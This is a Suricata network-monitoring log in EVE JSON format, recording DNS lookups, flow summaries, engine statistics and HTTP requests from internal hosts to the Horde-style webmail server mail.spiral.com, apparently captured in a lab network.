{"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:27.371073+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17052,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:28.000481+0000","flow_id":1565664501029723,"event_type":"flow","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:27.645979+0000","end":"2020-02-29T00:12:27.754252+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:28.721639+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":29494,"tx_id":1}} {"timestamp":"2020-02-29T00:17:29.000319+0000","flow_id":1151071323182789,"event_type":"flow","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":2061,"bytes_toclient":1048,"start":"2020-02-29T00:16:20.087749+0000","end":"2020-02-29T00:16:28.369273+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:29.282797+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37030,"tx_id":0}} {"timestamp":"2020-02-29T00:17:29.293462+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57080,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:29.490446+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124}} {"timestamp":"2020-02-29T00:17:31.000306+0000","flow_id":1009264372926241,"event_type":"flow","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:30.444193+0000","end":"2020-02-29T00:12:30.552573+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:32.000182+0000","event_type":"stats","stats":{"uptime":14704,"capture":{"kernel_packets":136375,"kernel_drops":0},"decoder":{"pkts":136386,"bytes":93749613,"invalid":192,"ipv4":134859,"ipv6":10,"ethernet":136386,"raw":0,"null":0,"sll":0,"tcp":129446,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2786,"new_pruned":16,"est_pruned":2428,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22151,"memcap_state":0,"memcap_global":0},"http":{"memuse":53676,"memcap":0}}} {"timestamp":"2020-02-29T00:17:34.495901+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24087,"tx_id":1}} {"timestamp":"2020-02-29T00:17:35.000918+0000","flow_id":1661936193407531,"event_type":"flow","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.494123+0000","end":"2020-02-29T00:12:34.602655+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:35.001148+0000","flow_id":964081317209505,"event_type":"flow","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.681377+0000","end":"2020-02-29T00:12:34.789685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:36.000818+0000","flow_id":1937329496453146,"event_type":"flow","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.913434+0000","end":"2020-02-29T00:12:35.022032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:38.000914+0000","flow_id":571869214283118,"event_type":"flow","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1223,"bytes_toclient":9670,"start":"2020-02-29T00:16:32.005486+0000","end":"2020-02-29T00:16:37.187743+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:39.000237+0000","event_type":"stats","stats":{"uptime":14711,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2786,"new_pruned":16,"est_pruned":2432,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21158,"memcap_state":0,"memcap_global":0},"http":{"memuse":36692,"memcap":0}}} {"timestamp":"2020-02-29T00:17:39.002411+0000","flow_id":745403072685010,"event_type":"flow","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":2042,"bytes_toclient":12710,"start":"2020-02-29T00:16:28.369618+0000","end":"2020-02-29T00:16:38.383459+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:39.002598+0000","flow_id":2162338538366341,"event_type":"flow","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:38.435589+0000","end":"2020-02-29T00:12:38.543962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.000418+0000","flow_id":1172073699101454,"event_type":"flow","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.805646+0000","end":"2020-02-29T00:12:44.913873+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.001175+0000","flow_id":224552373988062,"event_type":"flow","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.600798+0000","end":"2020-02-29T00:12:44.709050+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.001359+0000","flow_id":1915120221140576,"event_type":"flow","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:43.898656+0000","end":"2020-02-29T00:12:44.006850+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:46.000182+0000","event_type":"stats","stats":{"uptime":14718,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2788,"new_pruned":16,"est_pruned":2433,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19838,"memcap_state":0,"memcap_global":0},"http":{"memuse":36612,"memcap":0}}} {"timestamp":"2020-02-29T00:17:46.002322+0000","flow_id":989009308065649,"event_type":"flow","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.958321+0000","end":"2020-02-29T00:12:45.066699+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:48.000764+0000","flow_id":1965379946389945,"event_type":"flow","src_ip":"fe80:0000:0000:0000:f816:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:17:17.958905+0000","end":"2020-02-29T00:17:17.958905+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:50.000513+0000","flow_id":1057054490648417,"event_type":"flow","src_ip":"192.168.10.81","src_port":52766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10115,"start":"2020-02-29T00:16:44.024417+0000","end":"2020-02-29T00:16:49.489828+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:50.000663+0000","flow_id":101213813529097,"event_type":"flow","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1416,"bytes_toclient":20622,"start":"2020-02-29T00:16:38.383497+0000","end":"2020-02-29T00:16:49.869586+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:52.000591+0000","flow_id":340808549256710,"event_type":"flow","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:51.118278+0000","end":"2020-02-29T00:12:51.226233+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:52.001953+0000","flow_id":1932059572600311,"event_type":"flow","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:50.949751+0000","end":"2020-02-29T00:12:51.058015+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:53.000183+0000","event_type":"stats","stats":{"uptime":14725,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2790,"new_pruned":17,"est_pruned":2437,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":36532,"memcap":0}}} {"timestamp":"2020-02-29T00:17:53.002632+0000","flow_id":363769459871467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1154,"bytes_toclient":654,"start":"2020-02-29T00:16:47.167659+0000","end":"2020-02-29T00:16:52.301912+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:59.499151+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27338,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:59.702081+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:18:00.000341+0000","event_type":"stats","stats":{"uptime":14732,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2439,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":88251,"memcap":0}}} {"timestamp":"2020-02-29T00:18:00.001510+0000","flow_id":859365721232905,"event_type":"flow","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:59.579081+0000","end":"2020-02-29T00:12:59.687284+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:03.353729+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:03.630319+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319}} {"timestamp":"2020-02-29T00:18:04.703159+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52770,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} 